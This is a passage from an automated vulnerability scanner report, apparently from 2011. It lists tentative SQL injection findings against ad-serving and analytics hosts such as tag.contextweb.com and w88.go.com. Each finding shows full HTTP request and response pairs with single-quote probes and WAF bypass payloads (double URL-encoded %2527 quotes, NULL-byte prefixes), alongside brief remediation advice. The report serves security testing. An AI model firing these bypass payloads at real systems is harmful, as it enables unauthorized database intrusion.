P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:47:51 GMT
Content-Length: 2788
Connection: close
Set-Cookie: 539292_4_107784_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 539292_4_107784_-1=1316224071201; Domain=.contextweb.com; Path=/
Set-Cookie: vf=807; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3C%21--%20PubMatic%20ad%20tag%20%28Javascript%29%20%3A%20BostonHerald_728X90_ATF%20%7C%20http%3A%2F%2Fwww.bostonherald.com%2F%20%7C%20728%20x%2090%20Leaderboard%20%
...[SNIP]...

1.28. http://tag.contextweb.com/TagPublish/GetAd.aspx [pb_rtb_ev cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The pb_rtb_ev cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pb_rtb_ev cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the pb_rtb_ev cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"%2527; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 1

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP203
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:19:16 GMT
Content-Length: 2074
Connection: close
Set-Cookie: vf=592; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_300x250.jpg%20height%3D250%20border%3D0%20width%3D300%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app203_AjrHJFvs9xWj%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...

Request 2

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"%2527%2527; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 2

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP204
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 2372
Date: Sat, 17 Sep 2011 01:19:17 GMT
Connection: close
Set-Cookie: 538518_3_106142_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 538518_3_106142_-1=1316222357255; Domain=.contextweb.com; Path=/
Set-Cookie: vf=593; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid
...[SNIP]...

1.29. http://tag.contextweb.com/TagPublish/GetAd.aspx [pxy parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The pxy parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pxy parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the pxy request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=%2527&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 1

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP204
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CW-Loop: 13
CWDL: 13/123
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:18:39 GMT
Content-Length: 2074
Connection: close
Set-Cookie: vf=529; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Ca%20href%3Dhttp%3A%2F%2Fwww.smokeybear.com%20target%3D_blank%3E%3Cimg%20src%3Dhttp%3A%2F%2Fmedia.contextweb.com%2Fcreatives%2Fdefaults%2Fadc_wfp_smokeygetrid_300x250.jpg%20height%3D250%20border%3D0%20width%3D300%3E%3C%2Fa%3E%3C%21--ERROR_TAG%28id%3Dcw-app204_3NkTLnCH1peq%2C%20dl%3DDEF_LEVEL_13_LOOPING%2C%20reason%3DLoopCookie%2C%20source%3D%29--%3E%3Cdiv%20style%3D%22display%3Anone%3Bwidth%3A0%3Bheight%3A0%22%3E%3CIFRAME%20SRC%3D%22ht
...[SNIP]...

Request 2

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&cwr=&mrnd=39018456&if=1&tl=-1&pxy=%2527%2527&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239352026&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&refer=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221212076

Response 2

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP205
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/101
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:18:39 GMT
Content-Length: 1846
Connection: close
Set-Cookie: 538518_3_106142_-1=1316222319958; Domain=.contextweb.com; Path=/
Set-Cookie: vf=530; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid
...[SNIP]...

1.30. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s3647485188674 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://w88.go.com
Path:   /b/ss/wdgabccom,wdgasec/1/H.16/s3647485188674

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/wdgabccom,wdgasec%00'/1/H.16/s3647485188674?[AQB]&ndh=1&t=17/8/2011%200%3A58%3A52%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Aindex&g=http%3A//beta.abc.go.com/shows/charlies-angels&r=http%3A//s0.2mdn.net/1249573/CA_300x600.swf&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v16=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&c27=Unknown&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:16:10 GMT
Server: Omniture DC/2.0.0
Content-Length: 410
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/wdgabccom,wdgasec was not found on this server.
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/wdgabccom,wdgasec%00''/1/H.16/s3647485188674?[AQB]&ndh=1&t=17/8/2011%200%3A58%3A52%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Aindex&g=http%3A//beta.abc.go.com/shows/charlies-angels&r=http%3A//s0.2mdn.net/1249573/CA_300x600.swf&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v16=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Aindex&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&c27=Unknown&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:16:10 GMT
Server: Omniture DC/2.0.0
xserver: www661
Content-Length: 0
Content-Type: text/html


1.31. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://w88.go.com
Path:   /b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /b'/ss/wdgabccom,wdgasec/1/H.16/s39185238005593?[AQB]&ndh=1&t=17/8/2011%200%3A59%3A26%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Abios&g=http%3A//beta.abc.go.com/shows/charlies-angels/bios&r=http%3A//beta.abc.go.com/shows/charlies-angels&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Abios&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Abios&c9=atxt%2Bbios&c12=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Abios&v16=abccom%3Aprimetime%3Acharlies-angels%3Abios&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Abios&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&v24=Alfresco&c27=Unknown&c32=82f4af0d-d106-41a4-aa52-147d8fee51d1&v32=82f4af0d-d106-41a4-aa52-147d8fee51d1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=abccom%3Aprimetime%3Acharlies-angels%3Aindex&pidt=1&oid=http%3A//beta.abc.go.com/shows/charlies-angels/bios&ot=A&[AQE] HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; s_sess=%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios%252526ot%25253DA%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240966296%3B

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:26:47 GMT
Server: Omniture DC/2.0.0
Content-Length: 434
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b'/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 was n
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b''/ss/wdgabccom,wdgasec/1/H.16/s39185238005593?[AQB]&ndh=1&t=17/8/2011%200%3A59%3A26%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Abios&g=http%3A//beta.abc.go.com/shows/charlies-angels/bios&r=http%3A//beta.abc.go.com/shows/charlies-angels&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Abios&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Abios&c9=atxt%2Bbios&c12=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Abios&v16=abccom%3Aprimetime%3Acharlies-angels%3Abios&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Abios&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&v24=Alfresco&c27=Unknown&c32=82f4af0d-d106-41a4-aa52-147d8fee51d1&v32=82f4af0d-d106-41a4-aa52-147d8fee51d1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=abccom%3Aprimetime%3Acharlies-angels%3Aindex&pidt=1&oid=http%3A//beta.abc.go.com/shows/charlies-angels/bios&ot=A&[AQE] HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; s_sess=%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios%252526ot%25253DA%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240966296%3B

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:26:47 GMT
Server: Omniture DC/2.0.0
xserver: www600
Content-Length: 0
Content-Type: text/html


1.32. http://w88.go.com/b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://w88.go.com
Path:   /b/ss/wdgabccom,wdgasec/1/H.16/s39185238005593

Issue detail

